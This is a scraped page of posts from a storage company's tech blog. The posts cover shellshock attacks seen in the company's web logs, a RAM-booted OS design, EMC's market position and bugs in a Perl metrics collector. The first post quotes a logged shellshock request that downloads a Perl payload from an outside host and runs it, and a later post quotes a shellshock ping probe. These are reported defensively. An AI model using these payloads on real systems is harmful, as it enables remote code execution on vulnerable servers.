… and the shell shock attempts continue …

From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)

Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'

Viewed 1803 times by 575 viewers

Updated boot tech in Scalable OS (SIOS)

This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers.

Ok, first the back story.

One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.

This has troubled me for many years, and this is why tiburon, now SIOS has been the technology we’ve developed to solve this problem.

It turns out when you solve this problem you solve many others sort of automatically. But you also create a few.

The question of balance, which set of problems you want, and how you solve them, is what matters.

For a long time, we’ve been using NFS based OS management in the Unison storage system, as well as our FastPath big data appliances. This makes creation of new appliances as simple as installation and booting the hardware or VM. In fact, we’ve done quite a bit of debugging of odd software stacks for customers in VMs like this.

But the NFS model pre-supposes a fully operational NFS server available at all times. This is doable with a fail-over model, though it provides a potential single point of failure if not implemented as a HA NFS.

The model we’ve been working towards for a long time, was a correctly functional, and complete appliance OS that ran entirely out of RAM, but PXE booted the kernel/initrd, and then possibly grabbed a full OS image.

We want to specify the OS on the PXE command line, as SIOS aka tiburon, provides a database backed mechanism for configuration, presented as a trivial web-based API. We want all the parts of this served by PXE and http.

Well, we’ve made a major step towards the full version of this last week.

root@unison:~# cat /proc/cmdline 
root=ram BOOT_DEBUG=2 rw debug verbose console=tty0 console=ttyS1,115200n8 ip=::::diskless:eth0:dhcp ipv6.disable=1 debug rootfstype=ramdisk verbose

root@unison:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
rootfs          8.0G  2.5G  5.6G  31% /
udev             10M     0   10M   0% /dev
tmpfs            16M  360K   16M   3% /run
tmpfs           8.0G  2.5G  5.6G  31% /
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs            19G     0   19G   0% /run/shm
tmpfs           4.0G     0  4.0G   0% /tmp
tmpfs           4.0G     0  4.0G   0% /var/tmp
tmpfs            16K  4.0K   12K  25% /var/lib/nfs
tmpfs           1.0M     0  1.0M   0% /data

Notice what is completely missing from the kernel boot command line. Hint, its the root=… stuff. Hell, I could even get rid of the ip=:::: bit.

The rootfstype=ramdisk currently uses a hardwired snapshot of a pre-installed file system. But the way we have this written, we can fetch a specific image by adding in something akin to


rootimage=$URL

for appropriate values of $URL. The $URL can be over the high performance network, so, say, grabbing a 1GB image over a 10GbE or IB network should be pretty quick.

We could do iscsi, or FCoE, or SRP, or iSER, or … whatever we want if we want to attach an external block device, though given our concern with the extended failure domain and failure surface, we’d prefer the ramdisk boot.

We can have the system fall back to the pre-defined OS load if the rootimage fails. The booting itself can be HA.

So we can have a much simpler to set up HA http server handing images to nodes, config to nodes, as well as a redundant set of PXE servers … in a far easier to configure, at far lower cost, and far greater scalability. This will work beautifully at web scale, as all aspects of the system are fully distributable.

Couple this to our config server, and automated post boot config system, this is becoming quite exciting as a product in and of itself.

More soon, but this is quite exciting!

Viewed 2883 times by 751 viewers

That may be the fastest I’ve seen an exploit go from “theoretical” to “used”

Found in our web logs this afternoon. This is bash shellshock.

Request: '() {:;}; /bin/ping -c 1 104.131.0.69'

This bad boy came from the University of Oklahoma, IP address 157.142.200.11 . The ping address 104.131.0.69 is something called shodan.io.

Patch this one folks. Remote execution badness, and all that goes along with it.

Viewed 6854 times by 1311 viewers

Interesting bits around EMC

In the last few days, issues around EMC have become publicly known. EMC is the worlds largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on.

Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business. They are a huge revenue and profit generator, but there is no real growth left in the array business.

Moreover, you have companies like Pure Storage, Tegile, Tintri, Nimble, and a multitude of others all attacking EMC at its core market. Take a shrinking market, add in strong competition while decreasing the size of the market. Of course the competitors will also, eventually, have to deal with the fundamental evolution of the market, but until then, they can just attack the incumbent.

EMC is being forced into a difficult defensive posture, with the majority of the upside being no growth and simply treading water. The down side to losing market share to the upstarts is that will lose revenue and profit faster than the natural shrinkage of the market itself.

This is not that storage is a decreasing market, it decidedly is not. Its that the array portion is in a long term decline.



This is reflected in some analysis from the folks from Wikibon and others.

Unfortunately, this doesn’t spell good things for traditional array vendors. Like EMC.

This is a classical case where some good creative destruction is needed in the market. EMC would be best to do it to their own products, as Pure et al. will most assuredly do it to them if EMC does not.

This is usually very hard to do in larger companies, as many have entrenched power structures that resist the sort of changes needed.

Hopefully EMC can navigate these waters. Though as it seems, their discussions with HP have come to a grinding halt. That’s one way to solve the issue, break up the federation, sell off assets, and reorganize and reconfigure the rest.

Should be an exciting time for them. Sadly, not in a good way.

Viewed 7569 times by 1360 viewers

sios-metrics code now on github

See link for more details. It allows us to gather many metrics, saves them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.

Viewed 32481 times by 2653 viewers

Solved the major socket bug … and it was a layer 8 problem

I’d like to offer an excuse. But I can’t. It was one single missing newline.

Just one. Missing. Newline.

I changed my config file to use port 10000. I set up an nc listener on the remote host.

nc -k -l a.b.c.d 10000

Then I invoked the code. And the data showed up.

Without a ()*&*(&%&$%*&(^ newline.

That couldn’t possibly be it. Could it? No. Its way to freaking simple.

I went so far as to swap out using Socket::Class rather than IO::Network::Socket. Ok, admittedly, that was not a hard changeover. Very easy in fact.

But it gave me the same results.

Then I got the idea of putting up the nc listener as above. And no freaking newline.

It couldn’t be that this was the difference … could it?

This is just too bloody simple. Really, no way on earth it could be that. The bug is subtle, damn it, not simple!!!

So, to demonstrate that I am not a blithering moron, I put the newline in the send method.

And it started working.

/sigh

I am a blithering moron.

The other code (accidentally) included a newline in the value. And thats why it worked. This one, I happily removed the newline. And then things fell over.

Newline is like a semicolon at the end of the line for a programming language, some APIs require it and assume it. The socket API does not assume it, and will happily send whatever buffer you hand it. This is the correct behavior. The data collector API assumes that received data is terminated by a newline, so it can start its parsing.

Its the details that are killers.

Ok, it works now. Onto more parallel monitor debugging. Making sure it gets into the InfluxDB correctly. Once we have this done, a major issue in monitoring/metrics I’ve been itching to solve correctly is done.

I’ll put the code up for this as well. The monitoring code will work on *nix, MacOSX, and Windows, no matter if it is in VMs, containers, physical servers. This is why its so important for us, we can monitor near anything with it.

Viewed 34769 times by 2850 viewers

New monitoring tool, and a very subtle bug

I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today.

The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector. And I want it controllable in a very simple config file manner. This is to run on the client being monitored, and the data pushed back to the database.

Here is the basic config file layout:

# config-file-type: JSON 1
{
   "global" : {
      "log_to_file" : "1",
      "log_name" : "/tmp/metrics-$system.log",
    },

    "db" : {
      "host"    : "a.b.c.d",
      "port"    : "2003",
      "proto"   : "tcp"
    },

   "metrics" : {      
      "uptime" : {
          "command"   : "/home/landman/work/development/gui/plugins/uptime.pl",
          "interval"  : 5,
          "timeout"   : 2                
      },      
   } 
}

The database is pointed to by the db section, and the metrics are contained in the data structure as indicated. Command could be a script or a command line. Interval is the time in seconds between runs, and timeout is the maximum length in seconds before a child process is killed (preventing a run-away and accumulation of zombies).

The code reads this config, creates one thread per metric, opens its own connection to the database (yeah, potentially problematic for large numbers of metrics, will address that later). Then it takes the output of the command, does brain dead simple “parsing”.

The scripts look like this (can use any language, we don’t care)

#!/usr/bin/perl

use strict;
my ($rc,$u,$n);

chomp($rc = `cat /proc/uptime`);
if ($rc =~ /(\d+\.\d+)\s+(\d+\.\d+)/) {
   printf "uptime:%.2f\n",$1;
}

and the data they spit out is very simple as well.

landman@lightning:~/work/development/gui$ plugins/uptime.pl 
uptime:104612.03

Simple future optimizations include launching a process once that wakes up at a configurable time to return data and then goes back to sleep. Potentially important on busy systems.

The metrics.pl code then pulls this data in, slightly reformats it for graphite, and sends it off.

It, well, mostly … sort of … worked. I had to fix two bugs. Technically, I didn’t fix the bugs. I worked around them. They were not good bugs, and they are showing me I might need to rethink writing this code in Perl.

The first bug I caught was quite surprising. Using the IPC::Run module, which I’ve used for almost a decade, I create a run harness, and start the code running. Everything executes correctly. Output is generated correctly. Gets pulled into the program.

Notice how I didn’t say “gets pulled into the program correctly”. It took me a while to find this, and I had to resort to “first principles”.

 # I can't find where this bug is, but the last character of mvalue is wrong ...
 @c =split(//, $mvalue);
 pop @c;
 $mvalue = join('',@c);
 # ... so lop it off

For some reason, and I’ve not figured it out, we were getting a carriage return appended to the end of the output. Chomp, the “smart” code that lops off newline characters on input lines, was unable to handle this.

I only saw it in my debugging output, when output lines were corrupted. Something that should never happen. Did.

Ok. Si the code above splits the mvalue into its characters. I included a


$mvalue = join("|",@c);

in the code so I could see what it thought that should be. And sure enough, thats how I caught the bug that should not be.

The work around is hackish, but I can live with it until I can figure the rest out.

Its the next bug that is brutal. I have a work around. And its evil. Which is why I am thinking about rewriting in another language, as this may point to a bug in part of the core functionality. I need this to work quickly, so I’ll use the hack in the near term, but longer term, I need to have something that works and is easy to work with.

I am using IO::Socket::INET to connect a client to a remote socket. I am doing this inside of the threads::shared paradigm in Perl. For a number of reasons, Perl doesn’t have real threads … well it does and it doesn’t. Long story, but threads::shared is the best compromise, leveraging forking and some “magic”. Sockets generally work well in forked environments … at least servers do. I am not sure about clients now.

Brain dead simple constructors, nothing odd. Checking return values. All appears to be well.

then I do a send($msg) and …

… not a bloody thing. It “succeeds” but the data never shows up in the database.

So, here comes the hack. The send($msg) call is logically equivalent to “echo $msg | nc $host $port”, so replace that one line with the send, with this external call. See what happens.

Now data starts showing up.

Of course, the single threaded version of the testing code, where I built the code to do the actual sends, works great. Data shows up.

But not when the identical code (both calling the same methods in the module), is running in the threads::shared environment.

Grrrrr….

I’ll figure it out later. But this is a subtle bug. Very hard to characterize, and then I have to chase it down.

Viewed 34820 times by 2895 viewers

New 8TB and 10TB drives from HGST, fit nicely into Unison

The TL;DR version: Imagine 60x 8TB drives (480TB about 1/2 PB) in a 4U unit or 4.8PB in a rack. Now make those 10TB drives. 600TB in 4U. 6PB in a full rack.

These are shingled drives, great for “cold” storage, object storage, etc. One of the many functions that Unison is used for. These aren’t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per drive basis. But absolutely perfect for very large streaming loads. Think virtual tape, or streaming archives. Or streaming objects.

The short version is that we will use them when they make sense for customers extremely dense systems. The longer version is that you should be hearing more soon about this.

Just remember though that the larger the single storage element, the higher the storage bandwidth wall … the time to read/write the entire element. The higher this wall is, the colder the data is. Which for these drives, is their design point. But you still need sufficient bandwidth to drive these units, either over 10/40/100 GbE or IB of various flavors.

Viewed 43732 times by 3396 viewers

The Haswells are (officially) out

Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with Haswell architecture, more details including benchies … soon …) we figured we’d let it die down, as the meaningful information will come from real user cases.

Haswell is interesting for a number of reasons, not the least of which is 16 DPi/cycle, but fundamentally, its a more efficient/faster chip in many regards. The ring architecture may show some interesting artifacts in high memory contention codes, so we might see a number of cases where lower core count (MCC) variants are faster at certain codes than the high core count (HCC) units.

DDR4 is welcome as a change, and the 2133 LRDIMMs should be the DIMM of choice for most use cases.

Haswell should provide a serious uptick to siFlash performormance, which is, as we occasionally remind people, the fastest single converged server storage device in market, and not by a little bit. It will also give DeltaV a serious kick forward. Couple the faster processing with the massive 12g data rail guns we have …

Yeah, this should be an interesting next few months :D

Viewed 42753 times by 3414 viewers

Be sure to vote for your favorites in the HPCWire readers choice awards

Scalable Informatics is nominated in

  1. #12 for Best HPC storage product or technology,
  2. #20 Top supercomputing achievement which could be for this, this on a single storage box, or this this result ,
  3. #21 Top 5 new products or technologies to watch for our Unison
  4. and #22 for Top 5 vendors to watch

Our friends at Lucera are nominated for #4, Best use of HPC in financial services

Please do vote for us and our friends at Lucera!

Viewed 42968 times by 3391 viewers

Optimization WordPress Plugins & Solutions by W3 EDGE